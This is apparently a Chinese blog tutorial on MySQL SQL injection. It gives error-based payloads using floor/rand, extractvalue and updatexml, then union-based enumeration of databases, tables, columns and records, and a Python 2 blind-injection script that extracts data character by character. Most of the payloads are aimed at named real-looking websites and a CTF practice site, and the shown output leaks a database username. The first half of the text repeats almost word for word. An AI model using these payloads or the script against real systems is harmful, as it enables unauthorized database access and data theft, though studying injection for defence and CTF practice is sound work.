mysql:
报错注入:
以http://www.hexie.com/main/articleDetail.php?id=757
为例子:
http://www.hexie.com/main/articleDetail.php?id=757'
报错
方法一:(1)http://www.hexie.com/main/articleDetail.php
?id=757' and (select 1 from (select count(*),concat( version(),floor(rand(0)*2))x from information_schema.tables group by x)a) %23
能爆出版本号:5.5.20
报错信息:MySQL Query Error:select * from knowledge where id='757' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) #':Duplicate entry '5.5.201' for key 'group_key'
(2)替换掉加红加粗的version之后,我们可以查到更多的东西
www.hexie.com/main/articleDetail.php?id=757' and (select 1 from (select count(*),concat( (select User from mysql.user limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x )a) %23
查出用户名:phmisdbuser
报错信息:MySQL Query Error:select * from knowledge where id='757' and (select 1 from (select count(*),concat((select User from mysql.user limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x )a) #':Duplicate entry 'phmisdbuser1' for key 'group_key'
方法二:
(1)www.hexie.com/main/articleDetail.php?id=757' and extractvalue(1, concat(0x5c, version())) %23
能爆出版本号:5.5.20
报错信息:MySQL Query Error:select * from knowledge where id='757' and extractvalue(1, concat(0x5c,version())) #':XPATH syntax error: '\5.5.20'
(2)www.hexie.com/main/articleDetail.php?id=757' and extractvalue(1, concat(0x5c, (select User from mysql.user limit 1,1))) %23
查出用户名:phmisdbuser
报错信息:MySQL Query Error:select * from knowledge where id='757' and extractvalue(1, concat(0x5c,((select User from mysql.user limit 1,1)))) #':XPATH syntax error: '\phmisdbuser'
方法三:
(1)www.hexie.com/main/articleDetail.php?id=757' and 1=(updatexml(1,concat(0x5e24, (select version()),0x5e24),1)) %23
能爆出版本号:5.5.20
报错信息:MySQL Query Error:select * from knowledge where id='757' and 1=(updatexml(1,concat(0x5e24,(select version()),0x5e24),1)) #':XPATH syntax error: '^$5.5.20^$'
(2)www.hexie.com/main/articleDetail.php?id=757' and 1=(updatexml(1,concat(0x5e24, (select User from mysql.user limit 1,1),0x5e24),1)) %23
查出用户名:phmisdbuser
报错信息:MySQL Query Error:select * from knowledge where id='757' and 1=(updatexml(1,concat(0x5e24,(select User from mysql.user limit 1,1),0x5e24),1)) #':XPATH syntax error: '^$phmisdbuser^$'
【1】mysql常见的查询信息的语句
【2】user():当前用户信息
【3】select database() :当前数据库
【4】SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit 1,1:查询所有数据库
【5】一个一个遍历查询所有表:select table_name from information_schema.tables where table_schema='数据库名' limit 1,1
【6】一个一个遍历查询一个表的字段:select COLUMN_NAME from Information_schema.columns where table_Name = '表名' and TABLE_SCHEMA='数据库名' limit 1,1
【7】一个一个遍历数据:select 字段名 from 数据库名.表名 limit 1,1(Ps:一次只能遍历一个字段的一个数据)
【8】查询host 信息:select Host from mysql.user limit 1,1
union 注入:
举例子:http://www.hunyinshe.com/list.php?id=1
【1】首先,推测出这个表里面有多少字段:
http://www.hunyinshe.com/list.php?id=1 order by 1 – (返回正常页面)
http://www.hunyinshe.com/list.php?id=1 order by 2 –
(返回正常页面)
………………
http://www.hunyinshe.com/list.php?id=1 order by 32 –
(返回正常页面)
http://www.hunyinshe.com/list.php?id=1 order by 32–
(返回不正常页面)
这样推断出这个表里面有32个字段
【2】猜当前数据库名字:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 --
【3】猜所有数据库:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.SCHEMATA --
【4】猜所有的表名:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables --
【5】查数据库名为:mysql的所有表名:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables where table_schema= 0x6d7973716c--
(Ps:其中 0x6d7973716c是”mysql”的HEX编码)
【6】查数据库名为:xjdj的所有表名:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables where table_schema= 0x786a646a--
【7】查数据库为xjdj的cmsdj_user的字段名:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from Information_schema.columns where table_Name = 0x636d73646a5f75736572 and TABLE_SCHEMA=0x786a646a--
【8】查数据库为xjdj的cmsdj_user的字段名cd_name的数据:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,字段名,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from 数据库名.表名 limit 1,100 --
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=f&action=login
为例子
【1】爆数据库的版本:
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin' and (ascii(substring(version(),1,1))>0) #&pass=f&action=login
显示用户名错误
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin' and (ascii(substring(version(),1,1))<0) #&pass=f&action=login
显示数据库连接失败
我写了一个小程序来加快速度
大家只要把红色的sqlcomm的这个变量就行修改就可以得到想要的数据
Ps:科普一些mysql函数的用法
substring(str,start,length):截取字符串,str是要截取的字串,start 是从哪个地方截取,length是截取的长度
ascii(str):把字符转换成ascii码,str是要转换的字符
length(str):获取字符串的长度,要获取的字串
常用的东西查询语句有见文章上面:mysql常见的查询信息的语句
报错注入:
以http://www.hexie.com/main/articleDetail.php?id=757
为例子:
http://www.hexie.com/main/articleDetail.php?id=757'
报错
方法一:(1)http://www.hexie.com/main/articleDetail.php
?id=757' and (select 1 from (select count(*),concat( version(),floor(rand(0)*2))x from information_schema.tables group by x)a) %23
能爆出版本号:5.5.20
报错信息:MySQL Query Error:select * from knowledge where id='757' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) #':Duplicate entry '5.5.201' for key 'group_key'
(2)替换掉加红加粗的version之后,我们可以查到更多的东西
www.hexie.com/main/articleDetail.php?id=757' and (select 1 from (select count(*),concat( (select User from mysql.user limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x )a) %23
查出用户名:phmisdbuser
报错信息:MySQL Query Error:select * from knowledge where id='757' and (select 1 from (select count(*),concat((select User from mysql.user limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x )a) #':Duplicate entry 'phmisdbuser1' for key 'group_key'
方法二:
(1)www.hexie.com/main/articleDetail.php?id=757' and extractvalue(1, concat(0x5c, version())) %23
能爆出版本号:5.5.20
报错信息:MySQL Query Error:select * from knowledge where id='757' and extractvalue(1, concat(0x5c,version())) #':XPATH syntax error: '\5.5.20'
(2)www.hexie.com/main/articleDetail.php?id=757' and extractvalue(1, concat(0x5c, (select User from mysql.user limit 1,1))) %23
查出用户名:phmisdbuser
报错信息:MySQL Query Error:select * from knowledge where id='757' and extractvalue(1, concat(0x5c,((select User from mysql.user limit 1,1)))) #':XPATH syntax error: '\phmisdbuser'
方法三:
(1)www.hexie.com/main/articleDetail.php?id=757' and 1=(updatexml(1,concat(0x5e24, (select version()),0x5e24),1)) %23
能爆出版本号:5.5.20
报错信息:MySQL Query Error:select * from knowledge where id='757' and 1=(updatexml(1,concat(0x5e24,(select version()),0x5e24),1)) #':XPATH syntax error: '^$5.5.20^$'
(2)www.hexie.com/main/articleDetail.php?id=757' and 1=(updatexml(1,concat(0x5e24, (select User from mysql.user limit 1,1),0x5e24),1)) %23
查出用户名:phmisdbuser
报错信息:MySQL Query Error:select * from knowledge where id='757' and 1=(updatexml(1,concat(0x5e24,(select User from mysql.user limit 1,1),0x5e24),1)) #':XPATH syntax error: '^$phmisdbuser^$'
【1】mysql常见的查询信息的语句
【2】user():当前用户信息
【3】select database() :当前数据库
【4】SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit 1,1:查询所有数据库
【5】一个一个遍历查询所有表:select table_name from information_schema.tables where table_schema='数据库名' limit 1,1
【6】一个一个遍历查询一个表的字段:select COLUMN_NAME from Information_schema.columns where table_Name = '表名' and TABLE_SCHEMA='数据库名' limit 1,1
【7】一个一个遍历数据:select 字段名 from 数据库名.表名 limit 1,1(Ps:一次只能遍历一个字段的一个数据)
【8】查询host 信息:select Host from mysql.user limit 1,1
union 注入:
举例子:http://www.hunyinshe.com/list.php?id=1
【1】首先,推测出这个表里面有多少字段:
http://www.hunyinshe.com/list.php?id=1 order by 1 – (返回正常页面)
http://www.hunyinshe.com/list.php?id=1 order by 2 –
(返回正常页面)
………………
http://www.hunyinshe.com/list.php?id=1 order by 32 –
(返回正常页面)
http://www.hunyinshe.com/list.php?id=1 order by 32–
(返回不正常页面)
这样推断出这个表里面有32个字段
【2】猜当前数据库名字:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 --
【3】猜所有数据库:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.SCHEMATA --
【4】猜所有的表名:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables --
【5】查数据库名为:mysql的所有表名:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables where table_schema= 0x6d7973716c--
(Ps:其中 0x6d7973716c是”mysql”的HEX编码)
【6】查数据库名为:xjdj的所有表名:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.tables where table_schema= 0x786a646a--
【7】查数据库为xjdj的cmsdj_user的字段名:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from Information_schema.columns where table_Name = 0x636d73646a5f75736572 and TABLE_SCHEMA=0x786a646a--
【8】查数据库为xjdj的cmsdj_user的字段名cd_name的数据:
http://www.hunyinshe.com/list.php?id=1 and 1=2 union select 1,字段名,3,4,5,6,7,8,9,10,11,12,13,14,15,2,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from 数据库名.表名 limit 1,100 --
(Ps:前100条数据)
盲注:
我们以http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=f&action=login
为例子
【1】爆数据库的版本:
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin' and (ascii(substring(version(),1,1))>0) #&pass=f&action=login
显示用户名错误
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin' and (ascii(substring(version(),1,1))<0) #&pass=f&action=login
显示数据库连接失败
我写了一个小程序来加快速度
# -*- coding: gbk -*-
import urllib2
import urllib
sqlcomm="(SELECT SCHEMA_NAME FROM information_schema.SCHEMATA limit 1,1)"
data = {
"admin":"admin' and (ascii(substring(version(),1,1))=0) #",
"pass":"f",
"action":"login"}
def getlength():
for counti in range(1000):
data["admin"]="admin' and length(%s)=%s #&pass=f&action=login" % (sqlcomm,str(counti))
urldata=urllib.urlencode(data)
url="http://ctf1.simplexue.com/basic/inject/index.php?"+urldata
headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}
req = urllib2.Request(url,headers=headers)
resul=urllib2.urlopen(req).read()
resulstr=resul.decode('gbk')
if resulstr.find(u'数据库连接失败')==-1: #查找中文
print counti
return counti
return False
def sendhttp(countn,sign,num):
data["admin"]="admin' and (ascii(substring(%s,%s,1))%s%s) #" % (sqlcomm,str(countn),sign,str(middle))
urldata=urllib.urlencode(data)
url="http://ctf1.simplexue.com/basic/inject/index.php?"+urldata
headers={"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"}
req = urllib2.Request(url,headers=headers)
resul=urllib2.urlopen(req).read()
resulstr=resul.decode('gbk')
if resulstr.find(u'数据库连接失败')==-1:
return True
return False
coutnum= getlength()
for j in range(1,coutnum+1):
min,max=0,140
while min<=max:
middle=(max+min)//2
if sendhttp(j,"=",middle):
print chr(middle),
break
if sendhttp(j,">",middle):
min=middle+1
else:
max=middle-1
大家只要把红色的sqlcomm的这个变量就行修改就可以得到想要的数据
Ps:科普一些mysql函数的用法
substring(str,start,length):截取字符串,str是要截取的字串,start 是从哪个地方截取,length是截取的长度
ascii(str):把字符转换成ascii码,str是要转换的字符
length(str):获取字符串的长度,要获取的字串
常用的东西查询语句有见文章上面:mysql常见的查询信息的语句
5437
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
